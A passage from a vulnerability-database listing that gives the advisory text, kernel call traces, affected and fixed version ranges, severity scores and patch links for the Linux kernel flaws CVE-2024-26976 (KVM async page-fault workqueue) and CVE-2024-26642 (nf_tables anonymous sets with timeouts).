process_one_work+0x145/0x2d0
worker_thread+0x27e/0x3a0
kthread+0xba/0xe0
ret_from_fork+0x2d/0x50
ret_from_fork_asm+0x11/0x20
</TASK>
If kvm_clear_async_pf_completion_queue() actually flushes the workqueue,
then there's no need to gift async_pf_execute() a reference because all
invocations of async_pf_execute() will be forced to complete before the
vCPU and its VM are destroyed/freed. And that in turn fixes the module
unloading bug as __fput() won't do module_put() on the last vCPU reference
until the vCPU has been freed, e.g. if closing the vCPU file also puts the
last reference to the KVM module.
Note that kvm_check_async_pf_completion() may also take the work item off
the completion queue and so also needs to flush the work queue, as the
work will not be seen by kvm_clear_async_pf_completion_queue(). Waiting
on the workqueue could theoretically delay a vCPU due to waiting for the
work to complete, but that's a very, very small chance, and likely a very
small delay. kvm_arch_async_page_present_queued() unconditionally makes a
new request, i.e. will effectively delay entering the guest, so the
remaining work is really just:
trace_kvm_async_pf_completed(addr, cr2_or_gpa);
__kvm_vcpu_wake_up(vcpu);
mmput(mm);
and mmput() can't drop the last reference to the page tables if the vCPU is
still alive, i.e. the vCPU won't get stuck tearing down page tables.
Add a helper to do the flushing, specifically to deal with "wakeup all"
work items, as they aren't actually work items, i.e. are never placed in a
workqueue. Trying to flush a bogus workqueue entry rightly makes
__flush_work() complain (kudos to whoever added that sanity check).
Note, commit 5f6de5cbebee ("KVM: Prevent module exit until al
---truncated---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b Version: af585b921e5d1e919947c4b1164b59507fe7cd7b |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ab2c2f5d9576",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "82e25cc1c2e9",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "8730d6335e5",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "83d3c5e30961",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b54478d20375",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "a75afe480d43",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4f3a3bce428f",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "caa9af2e27c2",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3d75b8aa5c29",
"status": "affected",
"version": "af585b921e5d",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.38"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2.6.38",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.312",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.274",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.215",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.154",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.84",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.24",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.12",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26976",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T21:06:50.709457Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400 Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T21:08:04.785Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.782Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"virt/kvm/async_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ab2c2f5d9576112ad22cfd3798071cb74693b1f5",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "82e25cc1c2e93c3023da98be282322fc08b61ffb",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "f8730d6335e5f43d09151fca1f0f41922209a264",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "83d3c5e309611ef593e2fcb78444fc8ceedf9bac",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "b54478d20375874aeee257744dedfd3e413432ff",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "a75afe480d4349c524d9c659b1a5a544dbc39a98",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "4f3a3bce428fb439c66a578adc447afce7b4a750",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "caa9af2e27c275e089d702cfbaaece3b42bca31b",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
},
{
"lessThan": "3d75b8aa5c29058a512db29da7cbee8052724157",
"status": "affected",
"version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"virt/kvm/async_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.38"
},
{
"lessThan": "2.6.38",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "2.6.38",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Always flush async #PF workqueue when vCPU is being destroyed\n\nAlways flush the per-vCPU async #PF workqueue when a vCPU is clearing its\ncompletion queue, e.g. when a VM and all its vCPUs is being destroyed.\nKVM must ensure that none of its workqueue callbacks is running when the\nlast reference to the KVM _module_ is put. Gifting a reference to the\nassociated VM prevents the workqueue callback from dereferencing freed\nvCPU/VM memory, but does not prevent the KVM module from being unloaded\nbefore the callback completes.\n\nDrop the misguided VM refcount gifting, as calling kvm_put_kvm() from\nasync_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will\nresult in deadlock. async_pf_execute() can\u0027t return until kvm_put_kvm()\nfinishes, and kvm_put_kvm() can\u0027t return until async_pf_execute() finishes:\n\n WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm]\n Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass\n CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Workqueue: events async_pf_execute [kvm]\n RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm]\n Call Trace:\n \u003cTASK\u003e\n async_pf_execute+0x198/0x260 [kvm]\n process_one_work+0x145/0x2d0\n worker_thread+0x27e/0x3a0\n kthread+0xba/0xe0\n ret_from_fork+0x2d/0x50\n ret_from_fork_asm+0x11/0x20\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n INFO: task kworker/8:1:251 blocked for more than 120 seconds.\n Tainted: G W 6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/8:1 state:D stack:0 pid:251 ppid:2 flags:0x00004000\n Workqueue: events async_pf_execute [kvm]\n Call Trace:\n \u003cTASK\u003e\n __schedule+0x33f/0xa40\n schedule+0x53/0xc0\n schedule_timeout+0x12a/0x140\n __wait_for_common+0x8d/0x1d0\n __flush_work.isra.0+0x19f/0x2c0\n kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm]\n kvm_arch_destroy_vm+0x78/0x1b0 [kvm]\n kvm_put_kvm+0x1c1/0x320 [kvm]\n async_pf_execute+0x198/0x260 [kvm]\n process_one_work+0x145/0x2d0\n worker_thread+0x27e/0x3a0\n kthread+0xba/0xe0\n ret_from_fork+0x2d/0x50\n ret_from_fork_asm+0x11/0x20\n \u003c/TASK\u003e\n\nIf kvm_clear_async_pf_completion_queue() actually flushes the workqueue,\nthen there\u0027s no need to gift async_pf_execute() a reference because all\ninvocations of async_pf_execute() will be forced to complete before the\nvCPU and its VM are destroyed/freed. And that in turn fixes the module\nunloading bug as __fput() won\u0027t do module_put() on the last vCPU reference\nuntil the vCPU has been freed, e.g. if closing the vCPU file also puts the\nlast reference to the KVM module.\n\nNote that kvm_check_async_pf_completion() may also take the work item off\nthe completion queue and so also needs to flush the work queue, as the\nwork will not be seen by kvm_clear_async_pf_completion_queue(). Waiting\non the workqueue could theoretically delay a vCPU due to waiting for the\nwork to complete, but that\u0027s a very, very small chance, and likely a very\nsmall delay. kvm_arch_async_page_present_queued() unconditionally makes a\nnew request, i.e. will effectively delay entering the guest, so the\nremaining work is really just:\n\n trace_kvm_async_pf_completed(addr, cr2_or_gpa);\n\n __kvm_vcpu_wake_up(vcpu);\n\n mmput(mm);\n\nand mmput() can\u0027t drop the last reference to the page tables if the vCPU is\nstill alive, i.e. the vCPU won\u0027t get stuck tearing down page tables.\n\nAdd a helper to do the flushing, specifically to deal with \"wakeup all\"\nwork items, as they aren\u0027t actually work items, i.e. are never placed in a\nworkqueue. Trying to flush a bogus workqueue entry rightly makes\n__flush_work() complain (kudos to whoever added that sanity check).\n\nNote, commit 5f6de5cbebee (\"KVM: Prevent module exit until al\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:18.606Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
},
{
"url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
},
{
"url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
},
{
"url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
},
{
"url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
},
{
"url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
},
{
"url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
},
{
"url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
},
{
"url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
}
],
"title": "KVM: Always flush async #PF workqueue when vCPU is being destroyed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26976",
"datePublished": "2024-05-01T05:20:24.025Z",
"dateReserved": "2024-02-19T14:20:24.203Z",
"dateUpdated": "2025-05-04T09:01:18.606Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26642 (GCVE-0-2024-26642)
Vulnerability from cvelistv5
Published
2024-03-21 10:43
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: disallow anonymous set with timeout flag
Anonymous sets are never used with timeout from userspace, reject this.
Exception to this rule is NFT_SET_EVAL to ensure legacy meters still work.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 Version: 761da2935d6e18d178582dbdf315a3a458555505 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26642",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T17:43:46.916001Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:25.164Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.677Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/72c1efe3f247a581667b7d368fff3bd9a03cd57a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e07c16695583a66e81f67ce4c46e94dece47ba7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "72c1efe3f247a581667b7d368fff3bd9a03cd57a",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "8e07c16695583a66e81f67ce4c46e94dece47ba7",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
},
{
"lessThan": "16603605b667b70da974bea8216c93e7db043bf1",
"status": "affected",
"version": "761da2935d6e18d178582dbdf315a3a458555505",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: disallow anonymous set with timeout flag\n\nAnonymous sets are never used with timeout from userspace, reject this.\nException to this rule is NFT_SET_EVAL to ensure legacy meters still work."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:55.435Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9"
},
{
"url": "https://git.kernel.org/stable/c/e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f"
},
{
"url": "https://git.kernel.org/stable/c/fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351"
},
{
"url": "https://git.kernel.org/stable/c/7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199"
},
{
